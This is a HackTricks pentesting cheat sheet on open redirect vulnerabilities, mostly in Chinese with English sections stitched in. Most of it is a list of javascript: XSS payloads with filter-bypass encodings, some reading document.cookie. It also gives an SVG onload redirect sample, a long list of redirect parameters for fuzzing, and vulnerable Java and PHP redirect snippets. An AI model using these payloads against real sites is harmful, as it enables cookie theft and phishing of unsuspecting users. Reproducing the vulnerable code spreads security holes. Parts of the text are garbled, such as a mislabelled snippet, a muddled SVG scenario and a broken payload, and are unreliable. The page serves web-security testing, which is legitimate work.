hacktricks/pentesting-web/open-redirect.md

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>


# 开放重定向

## 重定向到本地主机或任意域

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md)
{% endcontent-ref %}

## 开放重定向到XSS
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
# Open Redirect 上传 svg 文件

---


## 攻击场景

攻击者可以利用应用程序中的开放重定向漏洞，诱使用户上传恶意 SVG 文件，并在用户访问包含恶意 SVG 文件的 URL 时执行恶意操作。

## 攻击描述

攻击者上传恶意 SVG 文件到应用程序，并利用开放重定向漏洞构造恶意 URL，将用户重定向到包含恶意 SVG 文件的 URL。当用户访问该 URL 时，浏览器会解析 SVG 文件并执行其中的恶意代码，从而导致攻击成功。

## 攻击步骤

1. 攻击者上传恶意 SVG 文件到应用程序。
2. 攻击者构造包含恶意 SVG 文件的 URL，并利用开放重定向漏洞。
3. 用户访问恶意 URL，浏览器解析 SVG 文件并执行其中的恶意代码。

## 防御建议

- 应用程序上传功能应该对上传的文件类型进行严格限制，避免上传 SVG 文件。
- 验证重定向 URL 是否在应用程序的控制范围内，避免开放重定向漏洞的利用。
```markup
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>
```
# 常见的注入参数

An open redirect vulnerability exists when a web application allows a user to redirect to an external site by manipulating the URL. This can be exploited by an attacker to redirect users to malicious websites to perform phishing attacks or distribute malware. To identify open redirect vulnerabilities, testers can manipulate parameters commonly used for redirection, such as:

- `url`
- `link`
- `next`
- `target`

By injecting malicious URLs into these parameters, testers can determine if the application is vulnerable to open redirects.
```
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
# 代码示例

### .Net
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
### Java

#### Open Redirect

An open redirect occurs when a web application redirects to a user-supplied link without proper validation. Attackers can abuse this vulnerability to redirect users to malicious websites, phishing pages, or other harmful content.

##### Example

Consider the following vulnerable Java code snippet:

```java
String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);
```

In this example, the web application blindly redirects users to the URL specified in the `redirect` parameter without any validation. An attacker can craft a malicious link like `http://vulnerable-website.com/?redirect=http://malicious-website.com` to redirect users to a harmful website.

##### Prevention

To prevent open redirect vulnerabilities in Java web applications, always validate and sanitize user-supplied input before using it to redirect users. Whitelist allowed URLs or domains and ensure that the redirect URL belongs to the expected domain.
```bash
response.redirect("http://mysafedomain.com");
```
### PHP

#### Open Redirect

An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. This can be abused by an attacker to craft a malicious link that redirects users to a phishing page or a malware download.

#### Example

Consider the following PHP code snippet:

```php
<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>
```

In this code, the script takes a URL from the `url` parameter in the query string and redirects the user to that URL using the `header()` function. An attacker can exploit this by crafting a link like `http://example.com/redirect.php?url=http://malicious-site.com`.

#### Impact

The impact of an open redirect vulnerability includes phishing attacks, malware distribution, and social engineering attacks. It can be used in combination with other vulnerabilities to further compromise the security of a web application.

#### Remediation

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a safe redirect method that does not rely on user-controlled input.
```php
<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
# 工具

* [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)

# 资源

* 在 [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) 中，您可以找到模糊列表。\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\
* [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)


<details>

<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

支持HackTricks的其他方式：

* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) 上**关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。

</details>